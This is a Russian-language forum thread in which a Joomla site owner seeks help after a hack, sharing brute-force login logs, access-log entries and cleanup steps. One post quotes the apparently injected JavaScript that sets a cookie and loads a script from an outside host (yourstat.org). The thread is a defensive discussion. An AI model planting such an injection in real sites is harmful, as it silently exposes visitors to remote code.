Взломали сайт, есть практика "лечения"? - Безопасность сайтов на Joomla

Joomla стоит 3.4.7

http://joomlaforum.ru/index.php/board,104.0.html в основном разделе полно рекомендаций. Советую воспользоватся сканером ai-bolit поле обновления всего, что возможно на сайте.

Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок

ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.

В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте

Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');}

Определить можно по лог файлам, с каких IP заходили...

Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.

Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?

Мне тут видео скинули, как шелл заливают. Руки бы оторвала.

Мне тут видео скинули, как шелл заливают. Руки бы оторвала.

В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?

Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?

Ага, читаю как сделать это. Спасибо за совет